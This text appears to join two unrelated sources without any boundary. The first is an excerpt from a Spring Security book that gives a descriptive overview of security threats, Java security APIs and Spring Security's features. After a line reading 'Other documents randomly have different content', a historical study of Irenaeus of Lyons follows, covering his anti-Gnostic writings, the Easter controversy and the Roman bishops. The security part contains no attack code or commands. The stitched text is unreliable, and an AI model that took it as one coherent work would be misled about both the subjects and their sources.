security, such as SSL.

14
Chapter 1 The Scope of Security

• Sensitive data protection: Sensitive data needs to be protected

against malicious attacks. This applies to the communication layer,
individual message transmission, and credentials data stores.
Encryption should be used in different layers to achieve the most
secure application possible.

Additional Security Concerns

There are many more security concerns than the ones explained so far. Because this
is a Spring Security book and not a general application-security book, it covers only
things related to Spring Security. However, we think it is important that you understand
that there are many more security concerns than those addressed directly by Spring
Security. The following is a quick overview of some of the most common ones. This is
only intended to make you aware of their existence, and we recommend you consult a
different source (such as a general software security textbook) to better understand all
these concerns.

• SQL (and other code) injection: Validating user input is vital to

application security. If data is not validated, an attacker could write
any string as input (including SQL or server-side code) and send that
information to the server. If the server code is not properly written,
the attacker could wreak significant havoc because she could execute
any arbitrary code on the server.

• Denial-of-service attacks: These attacks make the target system

unresponsive to its intended users. This is normally done by
saturating the server with requests to utilize all the server’s resources
and make it unresponsive to legitimate requests.

• Cross-site scripting and output sanitation: An injection can be

done where the target is the client part of the application. The idea
is that the attacker can make an application return malicious code
inside the web pages returned and thus execute it in the user’s
browser. This way, the attacker invisibly executes actions using the
real user’s authenticated session.

15
Chapter 1 The Scope of Security

• Unauthorized access: This occurs when an individual or entity

gains unauthorized entry to a system, network, or data. It can result
in data breaches, theft of sensitive information, or unauthorized
manipulation of systems.

• Malware and ransomware: Malware refers to malicious software

designed to disrupt, damage, or gain unauthorized access to systems.
Ransomware is a specific type of malware that encrypts data and
demands a ransom for its release. Both malware and ransomware can
lead to data loss, financial loss, and operational disruptions.

• Phishing and social engineering: Phishing involves fraudulent

attempts to obtain sensitive information, such as passwords or
financial details, by disguising it as a trustworthy entity via emails,
phone calls, or websites. Social engineering exploits human
vulnerabilities to manipulate individuals into revealing confidential
information or performing actions that can compromise security.

• Data breaches: These breaches occur when unauthorized

individuals access sensitive or confidential data, such as personal
information, credit card details, or intellectual property. Data
breaches can result in financial loss, reputational damage, and legal
consequences.

• Insider threats: These threats involve individuals with authorized

access to systems or information who misuse their privileges for
malicious purposes. This can include intentional data theft, sabotage,
or unauthorized disclosure of sensitive information.

• Weak authentication and password security: Weak or easily

guessable passwords, inadequate authentication mechanisms, and
insufficient password management practices can leave systems
vulnerable to unauthorized access and compromise.

• Vulnerabilities and software exploits: Software vulnerabilities, such

as unpatched or outdated systems, can be exploited by attackers to
gain unauthorized access, inject malware, or manipulate systems. It
is crucial to promptly apply security patches and updates to mitigate
these risks.

16
Chapter 1 The Scope of Security

• Cloud security: Organizations utilizing cloud services must address

specific security concerns, including data privacy, data segregation,
access control, and cloud provider vulnerabilities.

• IoT security: The proliferation of IoT devices introduces new

security challenges, including insecure device configurations, lack of
encryption, and vulnerabilities in IoT networks. Compromised IoT
devices can be used to launch attacks or gain unauthorized access to
networks.

Addressing these IT security concerns requires a comprehensive and multi-

layered approach, including implementing strong security controls, regular security
assessments, user education and awareness, incident response planning, and adherence
to security best practices.

Java Options for Security

Java and Java EE out-of-the-box security solutions are very comprehensive. They cover
areas ranging from a low-level permission system through cryptography APIs to an
authentication and authorization scheme.
The list of security APIs offered in Java is very extensive, as the following list of the
main ones shows.

• Java Cryptography Architecture (JCA) supports cryptographic

algorithms, including hash-digest and digital signature support.

• Java Cryptographic Extensions (JCE) mainly provides facilities for

the encryption and decryption of strings and secret key generation
for symmetric algorithms.

• Java Certification Path API (CertPath) provides comprehensive

functionality for integrating the validation and verification of digital
certificates into an application.

• Java Secure Socket Extension (JSSE) provides a standardized set

of features to support SSL and TLS protocols, both client and server,
in Java.

17
Chapter 1 The Scope of Security

• Java Authentication and Authorization Service (JAAS) provides a

service for authentication and authorization in Java applications. It
provides a pluggable system where authentication mechanisms can
be plugged in independently to applications.

• Java Generic Security Services (Java GSS-API) securely exchanges

messages between communicating applications. “Introduction
to JAAS and Java GSS-API Tutorials” is a series of tutorials
demonstrating various aspects of using JAAS and Java GSS-API.

The JDK is divided into modules. The following modules contain security APIs.

• java.base

• java.security.jgss

• java.security.sasl

• java.smartcardio

• java.xml.crypto

• jdk.jartool

• jdk.security.auth

• jdk.security.jgss

For the entire list of Java release 20 security APIs, please refer to https://docs.
oracle.com/en/java/javase/20/security/security-api-specification1.html.
Figure 1-7 shows the Java platform security architecture and elements.

18
Chapter 1 The Scope of Security

Figure 1-7. Java platform security architecture and elements

Spring Security’s main concerns are in the authentication/authorization realm. So,

it overlaps mainly with the JAAS Java API, although they can be used together, as you
will see later in the book. Most of the other APIs are leveraged in Spring Security. For
example, CertPath is used in X509AuthenticationFilter, and JCE is used in the spring-
security-crypto module.

Summary
This chapter introduced security from a general point of view down to defense-in-
depth mechanisms. It explained in a very abstract way the main concerns in IT security,
especially from an application point of view. It also briefly described the main Java APIs
that support security at different levels.
You can see that this chapter was a very quick overview of security concerns. It is
beyond the scope of this book to go any further than this on general topics, although
some of them are studied in more depth when they apply to Spring Security. This is
nothing like a comprehensive software security guide, and if you are interested in
learning more about software security in general, you should consult the specialized
literature. The next chapter introduces Spring Security.

19
CHAPTER 2

Introducing Spring
Security
In this chapter, you learn what Spring Security is and how to use it to address security
concerns about your application.
We describe what’s new in Spring Framework and Spring Security version 6. Using
Spring Security 6 with authentication and authorization is discussed in detail.
Finally, you look at the framework’s source code, how to build it, and the different
modules forming the powerful Spring Security project.

What Is Spring Security?

Spring Security is a framework dedicated to providing a full array of security services to
Java applications in a developer-friendly and flexible way. It adheres to the well-
established practices introduced by the Spring Framework. Spring Security tries to
address all the layers of security inside your application. In addition, it comes packed
with an extensive array of configuration options that make it very flexible and powerful.
Recall from Chapter 1 that it can be said that Spring Security is simply a
comprehensive authentication/authorization framework built on top of the Spring
Framework. Although most applications that use the framework are web-based, Spring
Security’s core can also be used in stand-alone applications.
Many things make Spring Security immediately attractive to Java developers. To
name just a few, consider the following list.

• It’s built on top of the successful Spring Framework. This is an

important strength of Spring Security. The Spring Framework has
become “the way” to build enterprise Java applications, and with
good reason. It is built around good practices and two simple yet

21
© Massimo Nardone, Carlo Scarioni 2024
M. Nardone and C. Scarioni, Pro Spring Security, https://doi.org/10.1007/979-8-8688-0035-1_2
Chapter 2 Introducing Spring Security

powerful concepts: dependency injection (DI) and aspect-oriented

programming (AOP). Also important is that many developers have
experience with Spring, so they can leverage that experience when
introducing Spring Security in their projects.

• It provides out-of-the-box support for many authentication

models. Even more important than the previous point, Spring
Security supports out-of-the-box integration with Lightweight
Directory Access Protocol (LDAP), OpenID, SAML 2.0, form
authentication, OAuth 2.0, Certificate X.509 authentication, database
authentication, Jasypt cryptography, and lots more. All this support
means that Spring Security adapts to your security needs—and not
only that, it can change if your needs change, without much effort
involved for the developer. More information on Jasypt cryptography
is at www.jasypt.org/.

This is also important from a business point of view because

the application can either adapt to the corporate authentication
services or implement its own, thus requiring only straightforward
configuration changes.

This also means that there is a lot less software for you to write,
because you are using a great amount of ready-to-use code that has
been written and tested by a large and active user community. To
a certain point, you can trust that this code works and use it with
confidence. And if it does not work, you can always fix it and send a
patch to those in charge of maintaining the project.

• It offers layered security services. Spring Security allows you to

secure your application at different levels, and to secure your web
URLs, views, service methods, and domain model. You can pick and
combine these features to achieve your security goals.

It is very flexible in practice. Imagine, for instance, that you offer services
exposed through RMI, the Web, JMS, and others. You could secure all
these interfaces, but maybe it’s better to secure just the business layer so
that all requests are secured when they reach this layer. Also, maybe you
don’t care about securing individual business objects, so you can omit
that module and use the functionality you need.
22
Chapter 2 Introducing Spring Security

• It is open source software. As part of the Pivotal portfolio,

Spring Security is an open source software tool. It also has a large
community and user base dedicated to testing and improving
the framework. Having the opportunity to work with open source
software is an attractive feature for most developers. The ability to
look into the source code of the tools you like and work with is an
exciting prospect. Whether our goal is to improve the tools or simply
to understand how they work internally, we developers love to read
code and learn from it.

Where Does Spring Security Fit In?

Spring Security is without question a powerful and versatile tool. But like anything else, it
is not a tool that adapts to everything you want to do. Its offerings have a defined scope.
Where and why would you use Spring Security? The following lists reasons and
scenarios.

• You need to develop web security. Spring Security provides robust

security features for web applications, including protection against
common web vulnerabilities, such as cross-site scripting (XSS), cross-
site request forgery (CSRF), and clickjacking.

• You need strong mechanisms for securing URLs. You want

to restrict access to specific resources and enforce secure
communication over HTTPS.

• Your application is in Java, Groovy, or Kotlin. The first thing to

take into account is that Spring Security can be written in languages
like Java, Groovy, or Kotlin and generally in any language supported
by the JVM. So if you plan to work in a non-JVM language, Spring
Security won’t be useful.

• You need role-based authentication/authorization. This is

the main use case of Spring Security. You have a list of users and
resources and operations on those resources. You group the users
into roles and allow certain roles to access certain operations on
certain resources. That’s the core functionality.

23
Chapter 2 Introducing Spring Security

• You want to secure a web application from malicious users. Spring

Security is mostly used in web application environments. When
this is the case, the first thing to do is allow only the users you want
to access your application, while forbidding all others from even
reaching it.

• You need to integrate with OpenID, LDAP, Active Directory, and

databases as security providers. If you need to integrate with a
particular Users and Roles or Groups provider, you should look at the
vast array of options Spring Security offers because integration might
already be implemented, saving you from writing lots of unnecessary
code. Sometimes you might not be exactly sure what provider your
business requires to authenticate against. In this case, Spring Security
makes your life easy by allowing you to switch between different
providers painlessly.

• You need to secure your domain model and allow only certain
users to access certain objects in your application. If you need fine-
grained security (that is, you need to secure on a per object, per user
basis), Spring Security offers the access control list (ACL) module,
which help you to do just that in a straightforward way.

• You want a nonintrusive, declarative way for adding security

around your application. Security is a cross-cutting concern, not a
core business functionality of your application (unless you work in a
security provider firm). As such, it is better to be treated as a separate
and modular add-on that you can declare, configure, and manage
independently of your main business concerns. Spring Security is
built with this in mind. Using servlet filters, XML configuration, and
AOP concepts, the framework tries not to pollute your application
with security rules. Even when using annotations, they are still
metadata on top of your code. They don’t mess with your code logic.
As a Java developer, you must try to isolate the Java configuration
into a configuration library and decouple it from the rest of the
application in a similar way you do with XML.

• You want to secure your service layer the same way you secure
your URLs, and you need to add rules at the method level for

24
Chapter 2 Introducing Spring Security

allowing or disallowing user access. Spring Security allows you

to use a consistent security model throughout the layers of your
application because it internally enforces this consistent model itself.
You configure users, roles, and providers in just one place, and both
the service and web layers use this centralized security configuration
transparently.

• You need your application to remember its users on their next

visit and allow them access. Sometimes you don’t want or need
the users of your application to log in every time they visit your site.
Spring supports out-of-the-box, remember-me functionality so that a
user can be automatically logged in on subsequent visits to your site,
allowing them full or partial access to their profile’s functionality.

• You want to use public/private key certificates to authenticate

against your application. Spring Security allows you to use X.509
certificates to verify the server’s identity. The server can also
request a valid certificate from the client for establishing mutual
authentication.

• You need to hide elements in your web pages from certain users
and show them to others. View security is the first layer of security in
a secured web application. It is normally not enough for guaranteeing
security. But it is very important from a usability point of view
because it allows the application to show or hide content depending
on the user currently logged in to the system.

• You need more flexibility than simple role-based authentication

for your application. For example, suppose that you want to
allow access only to users over 18 years of age using simple script
expressions. Spring Security 3.1 uses the Spring Expression Language
(SpEL) to allow you to customize access rules for your application.

• You want your application to automatically handle HTTP status

codes related to authorization errors (401, 403, and others).
The built-in exception-handling mechanism of Spring Security
for web applications automatically translates the more common
exceptions to their corresponding HTTP status codes; for example,
AccessDeniedException gets translated to the 403 status code.
25
Chapter 2 Introducing Spring Security

• You want to configure your application to be used from other

applications (not browsers) and allow these other applications
to authenticate themselves against yours. Another application
accessing your application should be forced to use authentication
mechanisms to gain access. For example, you can expose your
application through REST endpoints that other applications can
access with HTTP security.

• You are running an application outside a Java EE Server. If you run

your application in a simple web container like Apache Tomcat, you
probably don’t have support for the full Java EE security stack. Spring
Security can be easily leveraged in these environments.

• You are running an application inside a Java EE Server. Even if you

are running a full Java EE container, Spring Security is arguably more
complete, flexible, and easy to use than the Java EE counterpart.

• You are already using Spring in your application and want to

leverage your knowledge. You already know some of the great
advantages of Spring. If you are currently using Spring, you probably
like it a lot. You will probably like Spring Security as well.

Spring Security Overview

Spring Security 6 includes the following projects.

• Spring Security

• Spring Boot 3.0

• Spring Framework

• Spring Cloud Data Flow

• Spring Cloud

• Spring Data
• Spring Integration

• Spring Authorization Server

26
Chapter 2 Introducing Spring Security

• Spring for GraphQL

• Spring Batch

• Spring Hateoas

• Spring REST Docs

• Spring Amqp

• Spring Mobile

• Spring For Android

• Spring Web Flow

• Spring Web Services

• Spring LDAP

• Spring Session

• Spring Shell

• Spring Flo

• Spring Kafka

• Spring Statemachine

• Spring Io Platform

• Spring Roo

• Spring Scala

• Spring Blazeds Integration

• Spring Loaded

• Spring Xd

• Spring Social

For more information, please refer to the Spring project web page at https://
spring.io/projects.
Each of these projects is built on top of the facilities provided by the Spring
Framework itself, which is the original project that started it all. Think of Spring as the
hub of all these satellite projects, providing them with a consistent programming model

27
Chapter 2 Introducing Spring Security

and a set of established practices. The main points you see throughout the different
projects is the use of DI, XML namespace-based configuration, and AOP, which, as you
see in the next section, are the pillars upon which Spring is built. In the later versions of
Spring, annotations have become the most popular way to configure both DI and AOP
concerns.
This book introduces Spring Boot, analyzes Spring Framework, and develops Spring
Security version 6. Let’s start with Spring Boot.

What Is Spring Boot?

Spring Boot is an open source Java-based framework generally used for developing
microservice, enterprise-ready applications. Pivotal developed it to help developers
create stand-alone and production-ready Spring applications.
Spring Boot is an easy starting point for building all Spring-based applications and
running them as quickly as possible, with minimal upfront configuration of Spring.
When this book was written, Spring Boot 3.0 was the latest release (November 2022)
using Java 17+ and Jakarta EE 9.

Note Remember that a Spring Security application can be developed with Maven

or Gradle.

Spring Security is one of the Spring projects; it is dedicated exclusively to addressing

security concerns in applications.
For more information, please refer to the documentation at https://spring.io/
projects/spring-security.
Spring Security began as a non-Spring project. It was originally known as the
“Acegi Security System for Spring” and was not the big and powerful framework it is
today. Originally, it dealt only with authorization and leveraged container-provided
authentication. Because of public demand, the project started gaining traction, as more
people started using it and contributing to its continuously growing code base. This
eventually led to it becoming a Spring Framework portfolio project, and then later it was
rebranded as Spring Security.

28
Chapter 2 Introducing Spring Security

The following lists Spring Security’s major releases dates.

• 2.0.0 (April 2008)

• 3.0.0 (December 2009)

• 4.0.0 (March 2015)

• 5.0.0 (November 2017)

• 5.1.4 (February 2019)

• 6.1.0 (May 2023)

Java configuration for Spring Security was added to the Spring Framework in Spring
3.1 and extended to Spring Security in Spring 3.2 and is defined in a class annotated
@Configuration.
Spring Security 6 requires JDK 17 and uses the Jakarta namespace.
The project for many years now has been under the Pivotal umbrella of projects,
powered by the Spring Framework itself. But what exactly is the Spring Framework?

Spring Framework 6: A Quick Overview

We have mentioned the Spring Framework project a lot. It makes sense to give an
overview of it at this point, because many of the Spring Security characteristics we cover
in the rest of the book rely on the building blocks of Spring.
We admit we’re biased. We love Spring and have loved it for many years now. We
think Spring has so many advantages and great features that we can’t start a new Java
project without using it. Additionally, we tend to carry its concepts around when working
with other languages and look for a way to apply them because they now feel natural.
Spring Framework 5 was published in September 2017 and can be considered the
first major Spring Framework release since version 4 was released in December 2013.
Spring Framework latest release when this manuscipt was written is version 6.0.9
(May 2023).
Next, let’s briefly review the most important new features in Spring Framework 6.

29
Chapter 2 Introducing Spring Security

JDK 17+ and Jakarta EE 9+ Baseline

• Entire framework based on Java 17 source code level

• Migration from javax to jakarta namespace for Jakarta Servlet, JPA,

and so on

• Runtime compatibility with Jakarta EE 9 and Jakarta EE 10 APIs

• Compatible with latest web servers—Tomcat 101, Jetty 11,

Undertow 23

• Early compatibility with virtual threads (in preview as of JDK 19)

General Core Revision

• Upgrade to ASM 94 and Kotlin 17

• Complete CGLIB fork with support for capturing CGLIB-

generated classes

• Comprehensive foundation for ahead-of-time transformations

• First-class support for GraalVM native images

Core Container
• First-class configuration options for virtual threads on JDK 21

• Lifecycle integration with Project CRaC for JVM checkpoint restore

• Support for resolving SequencedCollection/Set/Map at
injection points

• Support for registering a MethodHandle as a SpEL function

• Validator factory methods for programmatic validator

implementations

30
Other documents randomly have
different content
author of the old and new covenants, and the judge of all
mankind77. He does not carry on his argument with much regularity,
and it would be difficult to give any useful analysis of it. But he
discusses, towards the end, in chapters thirty-seven, thirty-eight,
and thirty-nine, the great question of the accountability of man, and
the freedom of the will.

In the preface to the fifth book78, he announces his intention of

carrying on the argument by quotations from the writings of the
apostle Paul, to show that the same God who had spoken to
Abraham and given the law had in the latter days sent his Son to
give salvation to human flesh; which he pursues in [pg 039] the first
eighteen chapters, dwelling particularly on the doctrine of the
resurrection of the flesh (chap. 7-14), and corroborating S. Paul's
doctrine from other parts of Scripture. He is thence led to the object
and end of the scheme of salvation by Christ, and the opposition to
it by Satan (chap. 19-24), especially the great opposition to it
through the agency of antichrist (chap. 24-30), and passes from the
notice of the state of departed souls (chap. 31) to exhibit and
confirm his opinion of the terrestrial reign of Christ and the righteous
(chap. 32-35), concluding with the consummation of all things in the
eternal felicity of the just.

It will be seen by this slight sketch that the former part of the
treatise is by far the most regular; and for this sufficient reason, that
it was more completely studied and digested before it was written.
In the latter books, he adheres but imperfectly to the intention
announced in the preface, and introduces much matter which was
evidently suggested casually as he was writing, by some word or
expression he found himself using.

The work, as I have said, was written in Greek; but the greater
portion of the original has been lost. What remains has been
preserved by various authors in the form of quotations. In this way
two-thirds of [pg 040] the first book have come down to us; a few
detached fragments in the latter half of the second; considerably
larger and more numerous portions of the third; very little of the
fourth, but copious extracts from the fifth, especially near the
beginning. The whole, however, existed in the ninth century, as we
learn from the testimony of Photius79. But, although we have lost the
greater part of the original, an ancient Latin translation of the whole
work has been preserved to us. The precise antiquity of this version
we are unable to ascertain; but the closeness with which Tertullian
appears to follow it in many passages80, and in particular his making
the very same [pg 041] mistakes as the interpreter, (as for instance,
in regard to the name of the heretic Epiphanes, which they [pg 042]
have both rendered by an epithet, and others instanced by
Massuet,) almost amounts to a demonstration [pg 043] that he had
read that version. That it existed in the time of S. Augustin, is
certain, as he quotes it at least twice, almost word for word81.

The effect of this great work appears to have been decisive, for we
hear no more of any eminent person who held the Gnostic opinions.
They prevailed to a certain degree for the greater part of another
century, but they did not make head again. The name, indeed,
continued to have so great a charm, that Clement of Alexandria took
it from the heretics, and applied it to an intelligent Christian, whom
he depicts as the only true Gnostic. But the system, as a whole,
became so entirely extinct that scarce a trace of its influence
remains, except in the writings of those who had to combat it.

[pg 044]
In his opposition to the Gnostics, Irenæus had to combat a heresy;
the next circumstance which brought him forward was, a schism
which threatened to separate a portion of the Christian world from
the communion of its most influential Church. There had been a
variation in very early times, and indeed from the beginning,
between the Churches of Asia Minor, Syria, and Mesopotamia on the
one hand, and the rest of the Christian world on the other, in regard
to the keeping of Easter;—other Churches uniting in keeping Easter-
day on a Sunday, whilst the Christians of those countries kept it at
the Jewish passover, on whatever day of the week it happened to
fall82. The inconvenience had been felt in the time of S. Polycarp,
who sojourning in Rome in the time of its bishop Anicetus, they
endeavoured [pg 045] each to persuade the other to embrace the
practice he followed. But their conferences were without any other
effect than to cause both parties to agree to differ in peace83. But
Victor, who succeeded Eleutherus in the see of Rome, viewed the
matter in a different light. He had no doubt felt the inconvenience of
this diversity of practice when Blastus endeavoured to raise a schism
in Rome on this very point84. He therefore conceived the idea of
using his influence, as the bishop of the principal Church [pg 046] in
the world, to bring all Christians to one uniform rule. For this
purpose he wrote to certain85 leading bishops in Asia, requesting
them to convene synods of the neighbouring bishops, in order to
come to an agreement; which was done accordingly; and they all,
with the exception of the Churches above mentioned, wrote circular
letters to the whole catholic Church, affirming that with them the
apostolical tradition was, not to break their paschal fast until the
Sunday. Eusebius particularly mentions86 the dioceses in Gaul under
the superintendence of [pg 047] Irenæus as having agreed upon
such a synodical letter, which he asserts was in existence in his time.
So far, Victor was successful; and, probably upon the strength of the
almost universal agreement of the Churches, he appears to have
held out some threat to those of Asia Minor87, unless they thought
proper to conform to the general practice. This, however, they
absolutely refused to do; maintaining that their region abounded
with relics of apostles and martyrs, and that they preserved a
tradition purer than that of any other Church, and more consonant
with the Scriptures. This reply so incensed Victor, that he forthwith
issued letters, announcing that the Asiatic brethren were cut off from
the common unity of Christians88. Here, however, he was not
followed by those who had previously agreed with him; and Irenæus
in particular, in the name of the Christians in Gaul under his
jurisdiction, wrote both to Victor and to various other bishops89,
strongly [pg 048] pressing milder measures, and reminding the
Roman prelate of the example of Anicetus, one of his predecessors,
who paid Polycarp the highest honour, even when assured that he
would not conform to the Western custom, and regarded his own as
more apostolical.

What the immediate result of these letters was we are not informed
by any contemporary writer. Anatolius, indeed, (if the Latin version
of his Treatise on the Paschal Cycle, published by Bucherius, is to be
relied on,) asserts that Victor did not persist in his
excommunication90; and we know subsequently91 [pg 049] that
many Churches in Asia adhered to the Jewish reckoning, and yet
were not on that account regarded with any aversion by their
brethren; and it was not until the council of Nice that their bishops
there assembled agreed to follow the general custom92,—to which,
however, many persons did not conform in the time of Chrysostom.

The part which the bishop of Rome took in this matter requires
perhaps a more explicit notice. It has, no doubt, been felt that Victor
acted in a manner which countenances the claims set up by the
popes of later days; but when we come to examine, we shall find
that whatever claims he advanced, beyond what we should allow,
were discountenanced by the then catholic Church. He did, or
attempted to do, two things: first, to bring the whole Church [pg
050] to one practice in the observance of the feast of Easter;
secondly, when he did not succeed with some Churches, to
excommunicate the dissentients.

The first was laudable; inasmuch as Christians who travelled upon

business, or removed their residence from one part of Christendom
to another, had their feelings disturbed by finding their brethren
celebrating so important a festival on a different day from that to
which they were accustomed; and some weak or factious minds
were thus tempted to make divisions in Churches to which they
removed. This had been particularly the case in the Church of Rome,
as being a place of general resort; and therefore Victor, both on that
account, and as bishop of the principal Church in the world, very
rightly exerted himself to bring about uniformity. The course he took
was also a good one. He wrote to the principal bishops in various
countries, to request them to call synods of the neighbouring
bishops, that thus he might ascertain the sense of the catholic
Church. Nothing could be more prudent or temperate; nor was
anything apparently better calculated to persuade the minority, than
to find one consenting custom in so many Churches, in countries
separated so entirely from each other.

Now so far we have no claim set up inconsistent [pg 051] with the
station of influence and dignity which we readily concede to have
appertained to the Roman bishops from very early times; and which,
if not most grossly abused, would never have been denied to them.
Some93 have supposed that he, with his letters, issued a threat of
excommunicating those Churches which refused to comply with the
western custom; but that is opposed to the sequel of the history,
from which we learn that such a threat would have called forth
remonstrances, of which in this stage of the business we hear
nothing.

Having received letters from every quarter except from Asia Minor,
stating that the traditional custom was the same as that of Rome, he
then, instead of proceeding by persuasion, immediately conceived
the idea of compelling the dissentient Churches to comply with his
wishes, by threatening to cut them off from communion if they
declined. His threat had no effect, and he proceeded to put it into
execution, nothing doubting that the Churches who had been with
him hitherto would still stand by him. And this is the point at which
we encounter something like the modern papal claims; for he
declared the Churches of Asia Minor cut off, not only from his
communion, but from the common unity94. Some might argue that
he must have had some foundation [pg 052] for this claim; but till
something of the kind can be shown, we have no need to suppose
any ground but a strong desire of a rash and determined mind to
carry the point he had undertaken. Be the ground what it may, the
Catholic Church negatived his claim; those who agreed with him in
the desire of bringing about unity of practice95 would not unite with
him in excommunicating their brethren, but rebuked him sharply96;
and Irenæus in particular represented to him the difference between
his spirit and that of his predecessors. And so entirely abortive was
his attempt, that, as we have seen, about sixty years after, Firmilian,
in his letter to Cyprian97, expressly asserted that the peace and unity
of the Catholic Church had never been broken by differences about
the observance of Easter or other religious rites: and that, in alluding
to the conduct of Stephen, bishop of Rome, who had quarrelled with
the African bishops because their custom differed from the Roman
on the subject of rebaptizing those who had been baptized by
heretics; which would necessarily have brought to mind any schism
produced by Victor, a previous bishop of Rome, if any such had been
produced.

Here, then, we have the most satisfactory evidence [pg 053] that
the Catholic Church, so near to the Apostles' times, had decided
against the power of the bishop of Rome to cut off whom he might
think fit from the common unity; not that they knew nothing of such
a claim, but that it was practically made and decided against.

We have now brought to a close all the circumstantial part of the

public life of Irenæus. Eusebius98 (who is followed by Jerome99) has
preserved to us the names of others of his writings, which we have
now lost. Of these he mentions first, A Discourse to the Gentiles,
which he characterizes as very brief, and very necessary, or cogent,
and informs us that the title of it was Περὶ Ἐπιστήμης, which Jerome,
in his Catalogue, translates De Disciplina, and supposes it to be
different from the Discourse. Another tract he wrote, dedicated to
one Marcianus, On the Preaching of the Apostles. The last Eusebius
mentions is a volume of miscellaneous tracts or discussions, of which
the ninth fragment is probably a remnant.

[pg 054]
The Discourse concerning Easter, quoted by the author of the
Questions to the Orthodox100, formerly ascribed to Justin Martyr, may
have been his letter to Victor on that subject. Maximus101 cites some
Discourses on Faith, addressed to Demetrius, a deacon of Vienne, of
which we have two fragments, whether genuine or not, (numbered
IV. and V.) in the best editions of his Remains. Although forty-two
fragments, attributed to Irenæus, have been collected, chiefly from
Catenas, we have no clue for appropriating the greater part of them
to the writings of which they formed a portion. One of them (the last
in the Benedictine edition) is said to pertain to a discussion on the
Eternity of Matter; but whether belonging to a separate treatise, or a
remnant of his Discourse to the Gentiles, we have no means of
judging.

We have no account of the death of Irenæus upon which we can

absolutely depend. Jerome in one passage102 calls him a martyr, and
so does the author of the Questions and Answers above cited; but
no other early writer gives him that appellation; neither have we any
notice of his death by any [pg 055] earlier author than Gregory of
Tours103, who wrote towards the end of the sixth century, and who
asserts that he died a martyr in a bloody persecution, which the
martyrologists Usuard and Ado104 assert took place under Severus.
In fact all the martyrologists, both Latin and Greek, make him a
martyr. The tradition, therefore, appears a highly probable one. But
in whatever way he quitted this world, we may rest assured that his
name is written in the book of life. His body is said105 to rest in the
crypt under the altar of the Church of St. John at Lyons.

[pg 056]
Chapter II. Testimony of Irenæus to
Certain Facts of Church History.

There are two circumstances which must prevent us from expecting

that the writings of Irenæus should add largely to our stores of
historical knowledge; one, that his remains are not very considerable
in extent, and the other, that they are chiefly occupied in doctrinal
controversy. What, however, he does tell us, is important. He asserts
that the Church in his time was spread throughout the world106; and
particularly specifies the Churches in Germany, Iberia, (i. e. Spain),
amongst the Celts (i. e. in Gaul), in the East, in Egypt, in Lybia, and
in the centre of the [pg 057] world, by which he no doubt means
Palestine107. He likewise incidentally shows that the Gospel had been
preached in Ethiopia108. He furnishes no evidence concerning the
first missionaries, except in the case of Ethiopia, to which he informs
us the eunuch baptized by Philip was sent; but he declares explicitly
that all the Churches through the world, although differing in
usage109, had but one faith110, which was delivered to them at
baptism111.

He speaks of the Churches in general as having been settled by the

Apostles112, and particularly specifies [pg 058] that the Church of
Rome was founded by S. Peter and S. Paul, who appointed its first
bishop Linus113; that Polycarp was made bishop of Smyrna by
Apostles114, and that the succession from him had been kept up to
the time of his writing115; and that S. John watched over the Church
of Ephesus down to the time of Trajan116. He informs us that the
successors [pg 059] of the first bishops might be reckoned up in
many Churches down to his own time117, particularly specifies the
Churches of Rome and Smyrna118, and gives a catalogue of the
bishops of Rome as follows:—Linus, mentioned by S. Paul in his
epistles to Timothy119; Anencletus120; Clement121, who had seen and
conferred with the Apostles; Evarestus; Alexander; Xystus, or Sixtus;
Telesphorus, who suffered martyrdom; Hyginus; Pius; Anicetus;
Soter; Eleutherius122: and we have a fragment of a letter of [pg 060]
his own to Victor, the successor of Eleutherius123. He has preserved
an anecdote of St. John, viz. that upon one occasion entering a
bath, and seeing Cerinthus there, he withdrew precipitately, saying
that he was afraid lest the building should fall, because Cerinthus,
the enemy of the truth, was in it124. This anecdote is indeed at
variance with the notion of Christian charity current at the present
day, but it rests upon the testimony of Polycarp, who knew St. John
well; and it is strictly in accordance with the spirit of the directions
he himself gave to “the elect lady,” not to receive heretical teachers
into her house, or bid them God speed125.

We are likewise indebted to Irenæus for some particulars respecting

Polycarp. He states that he had been favoured with familiar
intercourse with St. [pg 061] John and the rest who had seen Jesus,
and had heard from them particulars respecting him and his miracles
and teaching126. He mentions his having spent some time in Rome in
the days of Anicetus127. He does not, indeed, state the cause of his
visit; but Eusebius128 and Jerome129 distinctly say that it was on
account of the Paschal controversy. This subject, amongst others,
our author states to have been discussed between them, and that
Polycarp rested his adherence to the Jewish practice upon his having
always kept Easter in that way with St. John and the other Apostles,
and consequently declined to change it; whereupon, to show that
this inflexibility had produced no breach of amity, Anicetus thought
proper to request Polycarp to officiate for him, and to take his place
at the holy communion130. During his stay there131 he met Marcion,
who inquired if he [pg 062] recognised him. His reply was, “I
recognise the first-born of Satan.” This severity (or bigotry, as it
would now be called) does not appear to have operated in his
disfavour; for he was instrumental in recovering to the Church many
who had been led away by the Gnostic delusions132. Irenæus
likewise mentions Polycarp's epistle to the Philippians133, and other
epistles to other Churches and individuals134.

Respecting Clement, whom Eusebius135 identifies with the companion

of S. Paul136, he states that he wrote a very effectual letter to the
Corinthians, to allay the dissensions which had arisen amongst them,
and to restore the integrity of their faith137. This is, of course, the
first epistle of S. Clement, to the genuineness [pg 063] of which his
mention of it is a powerful testimony.

He speaks of the Church of Rome not only as having been founded

and settled under its first bishop by St. Peter and St. Paul, but as
being one of the greatest and most ancient, well known to all
men138, preserving the true doctrine by the resort of persons from all
quarters, and possessing from this circumstance a more powerful
pre-eminence; and states that all Churches must on that account
resort to it139. It is well known that this is a passage upon which
Romanists very much rely, as establishing the claim of their Church
to be the mistress of controversies to all Christendom; and I have
chosen to give it the utmost force of which it is fairly capable, in
order to avoid the charge of slurring it over, and in order to show
that even thus it states nothing inconsistent with the doctrine of the
Church of England respecting the present Church of Rome. I will
therefore give a translation of the passage, which appears below,
and make some remarks upon that translation:—“For every Church
(that is, the faithful who are on all sides,) must on account of its
more powerful [pg 064] pre-eminence resort to this Church, in which
the apostolical tradition is preserved by those who are on all sides.”

There are several words in this passage which must influence the
sense of it. The first I shall notice is the word potentiorem, the more
especially as there is a various reading upon it. One MS. (the
Clermont) of considerable value, reads potiorem; but Massuet, who
examined it, says that it had been written pontiorem (but altered to
potiorem,) which is almost certainly a contraction for the common
reading. We must therefore, I conclude, sit down with the common
reading; although Massuet, in the Benedictine edition, and J. J.
Griesbach, in some remarks upon this passage140, prefer the other.
But what Greek word potentiorem represents must be matter of
conjecture; and no one who is acquainted with the manner in which
the translator has rendered Greek words will be inclined to lay much
stress upon it. It may have been put for ἱκανωτέραν, or κρείττονα;
or, in short, the comparative of any adjective which admits of being
rendered potens. We then come to the word principalitatem. This we
